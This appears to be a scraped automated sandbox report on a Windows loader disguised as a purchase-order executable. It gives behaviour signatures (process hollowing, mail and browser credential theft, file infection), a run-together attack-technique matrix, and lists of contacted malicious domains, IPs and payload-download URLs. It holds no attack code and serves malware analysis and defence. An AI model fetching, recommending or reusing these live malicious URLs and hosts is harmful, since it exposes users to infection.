                  Registry Run Keys / Startup Folder                  		1
                  Valid Accounts                  		3
                  Obfuscated Files or Information                  		NTDS2
                  File and Directory Discovery                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                  Access Token Manipulation                  		2
                  Software Packing                  		LSA Secrets36
                  System Information Discovery                  		SSHKeylogging124
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts311
                  Process Injection                  		1
                  Timestomp                  		Cached Domain Credentials1
                  Query Registry                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                  Registry Run Keys / Startup Folder                  		1
                  DLL Side-Loading                  		DCSync361
                  Security Software Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  File Deletion                  		Proc Filesystem41
                  Virtualization/Sandbox Evasion                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt532
                  Masquerading                  		/etc/passwd and /etc/shadow2
                  Process Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Valid Accounts                  		Network Sniffing1
                  Application Window Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Access Token Manipulation                  		Input Capture1
                  System Owner/User Discovery                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task41
                  Virtualization/Sandbox Evasion                  		Keylogging1
                  System Network Configuration Discovery                  		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers311
                  Process Injection                  		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572131 Sample: PURCHASE REQUIRED DETAILS 0... Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 60 reallyfreegeoip.org 2->60 62 ww7.przvgke.biz 2->62 64 19 other IPs or domains 2->64 78 Suricata IDS alerts for network traffic 2->78 80 Found malware configuration 2->80 82 Malicious sample detected (through community Yara rule) 2->82 86 17 other signatures 2->86 9 PURCHASE REQUIRED DETAILS 000487958790903403.exe 1 7 2->9         started        14 alg.exe 2->14         started        16 AppVClient.exe 2->16         started        18 18 other processes 2->18 signatures3 84 Tries to detect the country of the analysis system (by using the IP) 60->84 process4 dnsIp5 72 lwaziacademy.com 41.185.8.252, 443, 49706, 49707 GridhostZA South Africa 9->72 52 C:\Users\Public\Libraries\ymafvvdS.pif, PE32 9->52 dropped 54 C:\Users\Public\Sdvvfamy.url, MS 9->54 dropped 96 Writes to foreign memory regions 9->96 98 Allocates memory in foreign processes 9->98 100 Sample uses process hollowing technique 9->100 102 Allocates many large memory junks 9->102 20 ymafvvdS.pif 15 3 9->20         started        25 cmd.exe 1 9->25         started        27 esentutl.exe 1 9->27         started        74 084725.parkingcrew.net 13.248.148.254, 49729, 80 AMAZON-02US United States 14->74 104 Creates files in the system32 config directory 14->104 106 Contains functionality to behave differently if execute on a Russian/Kazak computer 14->106 108 Creates files inside the volume driver (system volume information) 18->108 110 Found direct / indirect Syscall (likely to bypass EDR) 18->110 file6 signatures7 process8 dnsIp9 66 checkip.dyndns.com 158.101.44.242, 49710, 80 ORACLE-BMC-31898US United States 20->66 68 ww99.przvgke.biz 72.52.179.174, 49722, 49727, 49728 LIQUIDWEBUS United States 20->68 70 8 other IPs or domains 20->70 44 C:\Windows\System32\wbengine.exe, PE32+ 20->44 dropped 46 C:\Windows\System32\wbem\WmiApSrv.exe, PE32+ 20->46 dropped 48 C:\Windows\System32\vds.exe, PE32+ 20->48 dropped 50 150 other malicious files 20->50 dropped 88 Tries to steal Mail credentials (via file / registry access) 20->88 90 Tries to harvest and steal browser information (history, passwords, etc) 20->90 92 Drops executable to a common third party application directory 20->92 94 Infects executable files (exe, dll, sys, html) 20->94 29 esentutl.exe 2 25->29         started        33 alpha.pif 25->33         started        35 esentutl.exe 25->35         started        39 6 other processes 25->39 37 conhost.exe 27->37         started        file10 signatures11 process12 file13 56 C:\Users\Public\alpha.pif, PE32 29->56 dropped 112 Drops PE files to the user root directory 29->112 114 Drops PE files with a suspicious file extension 29->114 116 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 29->116 41 xpha.pif 33->41         started        58 C:\Users\Public\xpha.pif, PE32 35->58 dropped signatures14 process15 dnsIp16 76 127.0.0.1 unknown unknown 41->76

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  PURCHASE REQUIRED DETAILS 000487958790903403.exe37%ReversingLabsWin32.Trojan.DBatLoader
                  PURCHASE REQUIRED DETAILS 000487958790903403.exe43%VirustotalBrowse
                  PURCHASE REQUIRED DETAILS 000487958790903403.exe100%AviraHEUR/AGEN.1326062

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  przvgke.biz
                  		172.234.222.143
                  		truefalse
                    		high
                    76899.bodis.com
                    		199.59.243.227
                    		truefalse
                      		high
                      ssbzmoy.biz
                      		18.141.10.107
                      		truefalse
                        		high
                        knjghuig.biz
                        		18.141.10.107
                        		truefalse
                          		high
                          vjaxhpbji.biz
                          		82.112.184.197
                          		truefalse
                            		high
                            pywolwnvd.biz
                            		54.244.188.177
                            		truefalse
                              		high
                              reallyfreegeoip.org
                              		104.21.67.152
                              		truefalse
                                		high
                                webmail.thematman.com.au
                                		103.20.200.105
                                		truefalse
                                  		unknown
                                  checkip.dyndns.com
                                  		158.101.44.242
                                  		truefalse
                                    		high
                                    cvgrf.biz
                                    		54.244.188.177
                                    		truefalse
                                      		high
                                      ww99.przvgke.biz
                                      		72.52.179.174
                                      		truefalse
                                        		unknown
                                        lpuegx.biz
                                        		82.112.184.197
                                        		truefalse
                                          		high
                                          084725.parkingcrew.net
                                          		13.248.148.254
                                          		truefalse
                                            		high
                                            npukfztj.biz
                                            		44.221.84.105
                                            		truefalse
                                              		high
                                              lwaziacademy.com
                                              		41.185.8.252
                                              		truetrue
                                                		unknown
                                                ww7.przvgke.biz
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  zlenh.biz
                                                  		unknown
                                                  		unknownfalse
                                                    		high
                                                    checkip.dyndns.org
                                                    		unknown
                                                    		unknownfalse
                                                      		high
                                                      uhxqin.biz
                                                      		unknown
                                                      		unknownfalse
                                                        		high
                                                        ww12.przvgke.biz
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          anpmnmxo.biz
                                                          		unknown
                                                          		unknownfalse
                                                            		high

                                                            Contacted URLs

                                                            NameMaliciousAntivirus DetectionReputation
                                                            http://cvgrf.biz/fapntrue
                                                              http://przvgke.biz/bjedefalse
                                                                https://lwaziacademy.com/royal/233_Sdvvfamydeotrue
                                                                  http://vjaxhpbji.biz/goescaydbiatntrue
                                                                    http://przvgke.biz/fauoppfalse
                                                                      http://lpuegx.biz/pfoxkxwneqnmhcsctrue
                                                                        http://ssbzmoy.biz/fupmvmgjbhmtsfalse
                                                                          http://ssbzmoy.biz/jaefalse
                                                                            http://przvgke.biz/cairvrfalse
                                                                              http://checkip.dyndns.org/false
                                                                                http://pywolwnvd.biz/nimjwtrue
                                                                                  http://npukfztj.biz/cbecuogqejfalse
                                                                                    http://vjaxhpbji.biz/ewvwgrtrue
                                                                                      http://cvgrf.biz/npdqgsoqmqtrue
                                                                                        http://lpuegx.biz/bwbcqohdtrue
                                                                                          http://lpuegx.biz/tjgeolaydhotrue
                                                                                            https://reallyfreegeoip.org/xml/8.46.123.228false
                                                                                              http://vjaxhpbji.biz/eooeltrue
                                                                                                http://vjaxhpbji.biz/ovwmjligotchftrue
                                                                                                  http://knjghuig.biz/uoxisrajkfalse
                                                                                                    http://lpuegx.biz/ahrvaxreocatrue
                                                                                                      http://knjghuig.biz/jedofahynfalse
                                                                                                        http://pywolwnvd.biz/kkatrue
                                                                                                          http://przvgke.biz/obujsmdyltfalse

                                                                                                            URLs from Memory and Binaries

                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                            http://82.112.184.197:80/ewvwgrydho;alg.exe, 0000000C.00000002.2678337066.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2504408832.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                http://ocsp.sectigo.com0PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  http://82.112.184.197:80/pfoxkxwneqnmhcscMalg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      http://ww99.przvgke.biz/bjedealg.exe, 0000000C.00000003.2279374376.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1825992446.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.000000000056F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800587225.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2503862949.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2281474066.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1804005716.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1783776008.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1830975438.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2504629883.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052183315.00000000005AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          https://lwaziacademy.com/royal/233_Sdvvfamydeo~PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            http://ww12.przvgke.biz/bjede?usid=18&utid=28672493896alg.exe, 0000000C.00000003.1830975438.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052183315.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1784696793.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800587225.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1825992446.00000000005BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              http://ww12.przvgke.biz:80/fauopp?usid=18&utid=28672494417alg.exe, 0000000C.00000003.1800721272.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                http://82.112.184.197/ewvwgralg.exe, 0000000C.00000003.2503862949.00000000005B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  http://18.141.10.107/jedofahynKalg.exe, 0000000C.00000003.1825992446.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1830975438.00000000005A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    http://18.141.10.107/jedofahynalg.exe, 0000000C.00000003.1825992446.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1826309227.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1830975438.00000000005A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      https://www.google.comymafvvdS.pif, 00000009.00000003.1780195449.000000002AE10000.00000004.00000020.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1780016826.000000002A730000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        http://ww12.przvgke.biz:80/bjede?usid=18&utid=28672493896alg.exe, 0000000C.00000003.1784206549.0000000000589000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          http://ww99.przvgke.biz:80/bjedealg.exe, 0000000C.00000003.1784206549.0000000000589000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzU3ZGE0MWNmalg.exe, 0000000C.00000003.1785018186.0000000001700000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              https://lwaziacademy.com/PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007A1000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                http://ww99.przvgke.biz:80/fauoppalg.exe, 0000000C.00000003.1826309227.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800721272.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  http://54.244.188.177/npdqgsoqmqYalg.exe, 0000000C.00000003.1685939273.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    http://54.244.188.177/alg.exe, 0000000C.00000003.1644704325.000000000056F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      https://lwaziacademy.com:443/royal/233_SdvvfamydeoPURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        http://18.141.10.107:80/jedofahynusid=18&utid=28672494417alg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052928274.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1826309227.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            http://82.112.184.197/tjgeolaydhoKalg.exe, 0000000C.00000003.2053936887.00000000005B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              http://172.234.222.143:80/fauoppalg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052928274.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1826309227.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800721272.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://sectigo.com/CPS0PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://82.112.184.197/ewvwgrngsalg.exe, 0000000C.00000003.2503862949.00000000005B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://lwaziacademy.com/royal/2PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.0000000020A7D000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                                                                                                      http://82.112.184.197/tjgeolaydhoalg.exe, 0000000C.00000003.2053936887.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.0000000000518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        http://82.112.184.197/eooelalg.exe, 0000000C.00000002.2678337066.000000000056F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.00000000005B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          http://rbg.nPURCHASE REQUIRED DETAILS 000487958790903403.exefalse
                                                                                                                                                                            http://82.112.184.197:80/tjgeolaydho;alg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052928274.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              http://54.244.188.177/kkaalg.exe, 0000000C.00000003.1644704325.000000000056F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1644501807.000000000058C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                http://82.112.184.197/eooelngsalg.exe, 0000000C.00000002.2678337066.00000000005B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  http://54.244.188.177:80/npdqgsoqmqalg.exe, 0000000C.00000003.1700499143.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1685939273.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://pcnatrk.net/track.alg.exe, 0000000C.00000003.1801065112.0000000001760000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1785018186.0000000001700000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://18.141.10.107:80/fupmvmgjbhmtsalg.exe, 0000000C.00000003.1700499143.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1668813012.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1685939273.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://lwaziacademy.com/royal/233_SdvvfamydeoM6PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007A1000.00000004.00000020.00020000.00000000.sdmpfalse
